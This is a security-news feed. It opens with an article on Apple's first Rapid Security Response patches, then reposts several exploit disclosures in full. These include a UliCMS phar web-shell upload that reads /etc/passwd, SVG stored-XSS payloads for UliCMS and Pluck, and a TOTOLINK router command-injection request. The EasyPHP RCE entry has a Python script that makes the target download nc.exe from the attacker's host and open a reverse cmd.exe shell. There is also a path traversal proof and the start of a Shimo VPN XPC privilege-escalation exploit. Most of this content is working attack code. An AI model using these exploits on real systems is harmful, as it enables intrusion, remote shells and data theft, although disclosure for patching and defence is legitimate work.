Categories: Apple
Categories: News
Tags: macOS

Tags:  iOS

Tags:  iPadOS

Tags:  Rapid Security Response

Tags:  RSR

After announcing Rapid Security Response (RSR) last year, Apple has finally released the first RSR patches to the public.



(Read more...)




The post Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users appeared first on Malwarebytes Labs.

On Monday, Apple released its first batch of Rapid Security Response (RSR) patches, **iOS 16.4.1 (a)**, **iPadOS 16.4.1 (a)**, and **macOS 13.3.1 (a)**, for iPhone and iPad, and macOS devices, respectively.

RSR is a new type of software patch delivered between Apple's regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They're meant to make the deployment of security improvements faster and more frequent. According to an Apple notice about RSRs, the new updates "may also be used to mitigate some security issues more quickly, such as issues that might have been exploited or reported to exist 'in the wild'."

Think of it as the company's version of Microsoft's out-of-band (OOB) patches.

"When a Rapid Security Response has been applied, a letter appears after the software version number, as in this example: macOS 13.3.1 (a)," the notice said, giving users a glimpse of how RSR versioning works.

Apple introduced Rapid Security Response updates with the launch of iOS 16, iPadOS 16, and macOS Ventura at its Worldwide Developers Conference last summer. Devices allow automatic RSR patching by default, but the company provided its users with the option to disable it. You can visit this Apple Support page to learn how you can do this on iPhone, iPad, and Mac.

If you _do_ disable RSR, you will still receive security fixes as part of Apple's regular software updates, just as you did previously. However, not getting a quick fix when it's available could leave your device vulnerable to in-the-wild exploits.

Apple began testing RSR last year, with its beta testers. Monday's patches were the first to be released to the public. Some users reported they couldn't install the updates, even when devices successfully downloaded the patches, but that problem seems to have been resovled now, according to The Verge.

The company also didn't make clear what security fixes RSR for iOS, iPadOS, and macOS addressed, since there were no notes released for them. Moving forward, Apple will only make RSR available to all devices running the latest version of iOS, iPadOS, and macOS.

RSRs aren't the only recent innovation that should make it harder for criminals to exploit Apple devices. On April 21, we reported on Citizen Lab's investigation into the effectiveness of Apple's Lockdown Mode, a feature designed to provide a safer environment for users at a higher risk from targeted attacks, such as those developed by NSO Group, the company behind the notorious spyware Pegasus, and QuaDream. NSO Group is known to take advantage of 0-day vulnerabilities. RSRs should improve protection further by allowing Apple to patch those 0-days immediately after they're discovered.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

Apple Security Advisory 2023-05-03-1 - AirPods Firmware Update 5E133 and Beats Firmware Update 5B66 address bluetooth authentication vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-05-03-1 AirPods Firmware Update 5E133 andBeats Firmware Update 5B66AirPods Firmware Update 5E133 and Beats Firmware Update 5B66address the following issues. Information about the security contentis also available at https://support.apple.com/HT213752.AirPods Firmware Update 5E133Released April 11, 2023BluetoothAvailable for: AirPods (2nd generation and later), AirPod Pro (all models),AirPods MaxImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSFirmware updates are automatically delivered while your AirPods arecharging and in Bluetooth range of your iPhone, iPad, or Mac.Learn more about firmware updates for AirPods. Beats Firmware Update 5B66Released May 2, 2023BluetoothAvailable for: Powerbeats Pro, Beats Fit ProImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSIf you paired your Beats wireless headphones with your iPhone, iPad, orMac, your Beats will update automatically. Learn more about firmware updatesfor Beats. You can check the firmware version of your wireless headphones in Bluetoothsettings on your device. 1. On your iPhone or iPad, go to Settings > Bluetooth. On your Mac, go toSystem Settings > Bluetooth. 2. Tap on the info button next to your headphones.-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmRS94AACgkQ4RjMIDkeNxnu4g/+ORGK+ShjgE7mTdv7kmpBLzslblq6S9h/z3Q5GDcs9nyzxkXt3Q9/WRRdgUoPdGavnsIqfY5yU7qig1ybUQItEsGuEz4jF32gmXTuUMTUnAYHVSZYgmo/6tlT2Vvo08R+5fNWjBNxqEQMM0hQjzj3I37fsIEBR7CwGvzvsofrctRkfPuEi6q+yztMmM1LuVAixeHTy2J/GLXPA62WBUVdfooEAEIHQADHbXRgvvjALhIegyut4DY7BjJKSYo/n5U8NHxh/HjocgxATJUAUJU2ua2QrRWnzLA1n2HS9mJdm385FS3NZTRXfvTMMeAix7DAE82utWkweTIF5rmycjnQ8GHgqFSgtUWS9aMe7Hjj9872rDmIFwi2EQk0LtWAElhqF4yGkwa42+CKraa48XR1Ai9/QBNoeJPkNzRu7UZrrB5inYNaWP6nGX8XTS2rrxHDo1PFUYI7eEkqu5pq78LEQzyvnfx5scBwBXfc4dmkuzmn9+UbYlHLoKmni1w6mS8v0yXqCPXI+gG3dO3lmoshtPbqvaE+yTjLcG57rS61Dxol2Q00iL4ZvDbbYp/9c08W1SkVh4PCeKss3+CxBZ2/a4GBpESjkq7EdipRVkXC3TjN+ZvGMETXetBW102+c0gF49uBR+w+nouTRxK+boYBqPxAkhHsn7z6o31sCT2Op9s==AsH2-----END PGP SIGNATURE-----

Apple Security Advisory 2023-05-03-1

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数internetPri中的内容传递给v20，之后将v20带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"internetPri":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30054: ttt/161 at main · Am1ngl/ttt

TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数iptvVer中的内容传递给v19，之后将v19带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"iptvVer":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30053: ttt/160 at main · Am1ngl/ttt

An issue in the helper tool of Mailbutler GmbH Shimo VPN Client for macOS v5.0.4 allows attackers to bypass authentication via PID re-use.

**Shimo 5.0.4 - Privilege Escalation**

In the Shimo VPN client in version 5.0.4 on macOS, the com.feingeist.shimo.helper tool implements an unprotected XPC service that can be abused to create scripts as root on the filesystem, what can lead to privilege escalation.

When a client connects to the service the incomming connection is verified using processIdentifier instead of audit_token. Such a mechanism is prone to PID reuse attack. During this attack it is possible to impersonate a legitimate client and use all methods offered by ShimoHelperToolProtocol protocol.

Vulnerable method of ShimoHelperTool Class. As shown below, the verification is based on PID, so it is possible to bypass client restrictions:

/\* @class ShimoHelperTool \*/
-(char)listener:(void \*)arg2 shouldAcceptNewConnection:(void \*)arg3 {
    r13 = self;
    r15 = \[arg2 retain\];
    r12 = \[arg3 retain\];
    rax = \[r13 listener\];
    rax = \[rax retain\];
    if (rax == r15) {
            \[rax release\];
            if (r12 != 0x0) {
                    var\_48 = r13;
                    var\_50 = r15;
                    var\_40 = \*\*\_kSecGuestAttributePid;
                    rdx = \[r12 processIdentifier\]; // VERIFICATION IS BASED ON PID
                    rax = \[NSNumber numberWithInt:rdx\];
                    rax = \[rax retain\];
                    r15 = rax;
                    var\_38 = rax;
                    rax = \[NSDictionary dictionaryWithObjects:rdx forKeys:&var\_40 count:0x1\];
                    r13 = \[rax retain\];
                    \[r15 release\];
                    rax = SecCodeCopyGuestWithAttributes(0x0, r13, 0x0, &var\_60);
                    if (rax != 0x0) {
                            r14 = 0x0;
                            syslog$DARWIN\_EXTSN(0x3);
                    }
                    else {
                            rax = SecRequirementCreateWithString(@"anchor apple generic and (identifier \\"com.feingeist.Shimo\\" or identifier \\"com.feingeist.Shimo-setapp\\") and certificate leaf\[subject.OU\] = UD5L677SZR", 0x0, &var\_58);
                            if (rax == 0x0) {
                                    rcx = &var\_68;
                                    rax = SecCodeCheckValidityWithErrors(var\_60, 0x0, var\_58, rcx);
                                    if (rax != 0x0) {
                                            r14 = 0x0;
                                            syslog$DARWIN\_EXTSN(0x3);
                                    }
                                    else {
                                            rax = \[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol), rcx\];
                                            rax = \[rax retain\];
                                            \[r12 setExportedInterface:rax, rcx\];
                                            \[rax release\];
                                            \[r12 setExportedObject:var\_48, rcx\];
                                            \[r12 resume\];
                                            r14 = 0x1;
                                    }
                            }
                            else {
                                    r14 = 0x0;
                                    syslog$DARWIN\_EXTSN(0x3);
                            }
                    }
                    var\_30 = \*\*\_\_\_stack\_chk\_guard;
                    \[r13 release\];
                    \[r12 release\];
                    \[var\_50 release\];
                    if (\*\*\_\_\_stack\_chk\_guard == var\_30) {
                            rax = r14 & 0xff;
                    }
                    else {
                            rax = \_\_stack\_chk\_fail();
                    }
            }
            else {
                    rax = sub\_10000ea0a();
            }
    }
    else {
            rax = sub\_10000ea2d();
    }
    return rax;
}

**Exploit code**

Following expoit code was used to connect to the vulnerable helper, impresonate a legitimate client using PID reuse attack and execute a mehod writeConfig: atPath: withReply:, which allows for writing an arbitrary file at the disk. The file is created and owned by root user :

#import <Foundation/Foundation.h\>
#include <spawn.h\>
#include <signal.h\>

// gcc -framework Foundation -framework Security shimo.m -o shimo

static NSString\* XPCHelperMachServiceName = @"com.feingeist.shimo.helper";

@protocol ShimoHelperToolProtocol
- (void)setTimeMachineEnabled:(BOOL)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)runVpncScript:(NSString \*)arg1 withReason:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)cleanSystem:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)cleanKnownHostsForRemoteHost:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)unloadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)loadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)configureRoutingWithCommand:(NSString \*)arg1 withReply:(void (^)(NSError \*, NSString \*))arg2;
- (void)terminateRacoonDaemonWithReply:(void (^)(NSError \*))arg1;
- (void)reloadRacoonConfigWithReply:(void (^)(NSError \*))arg1;
- (void)updateNameServerAddresses:(NSArray \*)arg1 searchDomains:(NSArray \*)arg2 defaultDomain:(NSString \*)arg3 forServiceIdentifier:(NSString \*)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)deleteConfigAtPath:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)disconnectService:(long long)arg1 fromRemoteHost:(NSString \*)arg2 withComPort:(unsigned long long)arg3 withPID:(int)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)connectOpenConnectWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withHash:(NSString \*)arg4 withComPort:(unsigned long long)arg5 withReply:(void (^)(NSError \*, int))arg6;
- (void)connectRacoonToHost:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 withReply:(void (^)(NSError \*, int))arg4;
- (void)connectSSHWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withComPort:(unsigned long long)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectPPPWithConfig:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 requiresRacoon:(BOOL)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectVPNCWithConfig:(NSString \*)arg1 withComPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, int))arg3;
- (void)connectOpenVPNWithConfig:(NSString \*)arg1 withManagementPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, NSString \*))arg3;
